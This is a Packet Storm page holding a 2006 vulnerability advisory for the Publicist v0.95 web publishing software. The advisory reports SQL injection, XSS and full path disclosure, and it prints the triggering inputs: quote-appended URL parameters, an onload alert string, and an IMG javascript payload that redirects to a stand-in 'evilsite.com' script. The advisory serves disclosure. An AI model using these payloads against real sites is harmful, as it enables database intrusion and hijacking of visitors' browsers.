what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Publicistv0.95.txt

Publicistv0.95.txt
Posted May 26, 2006
Authored by Luny

Publicist v0.95 suffers from full path disclosure, XSS, and SQL injection vulnerabilities.

tags | advisory, vulnerability, sql injection
SHA-256 | 416a475f3c96faf299d1daa790d2bc8ea03d0f8124783243545c490ba685e6f3
Download | Favorite | View

Publicistv0.95.txt

Change Mirror Download
Publicist v0.95 

Homepage:
http://publicist.kau.se/ 

Description:
Publicist is a free web server software, created for web papers, that allows groups of people to write and publish together on the web (i.e. schools or single classes, clubs, or other groups who wish to express themselves). 

-------------------------------------- 

Exploits & Vulnerabilities: 

Full path and SQL Query errors: 

Type the following in login box: [BODY ONLOAD=alert('XSS')]
and it produces: 

1064: You have an error in your SQL syntax near 'XSS')>'' at line 1 Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /var/www/html.example. com/left.php on line 63 

SQL injection on return variable: http://www.example.com/info.php?id=1147443203&return_=3' 

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /var/www/html.publicist. kau.se/count.php on line 6 Unable to process query: You have an error in your SQL syntax near ''/info.php?id=1147443203&return_=3'', count=1' at line 1 

SQL Injection on visa variable: 
http://www.example.com/hitlist_editorial_public_info.php?visa=dan.akerlund' 

Warning: mysql_numrows(): supplied argument is not a valid MySQL result resource in /var/www/examplesite.com/ hitlist_editorial_public_info.php on line 73 

Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /var/www/examplesite.com /hitlist_editorial_public_info.php on line 74 



Submiting html tags in the comment boxes produces this SQL queue error: 

1064: You have an error in your SQL syntax near 'evilcode'))>', c_show = '1', c_time = '1' at line 7 



XSS Vulnerability: 

An XSS attack is possible by entering in the comment box some html code like this: 

[IMG SRC=javascript:window.location('http://www.evilsite.com/evilcode.js')] 

It should also be noted that calling the files c_getMsg.php, c_getUser.php, count.php, display full path errors and contain mysql connect info: 

Example of the above errors: 

Warning: mysql_connect(): Access denied for user: 'example@localhost' (Using password: YES) in /var/www/html.example.com/c_getUser.php on line 2
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Site Links
News by Month
News Tags
Files by Month
File Tags
File Directory
About Us
History & Purpose
Contact Information
Terms of Service
Privacy Statement
Copyright Information
Services
Security Services
Hosting By
Rokasec
close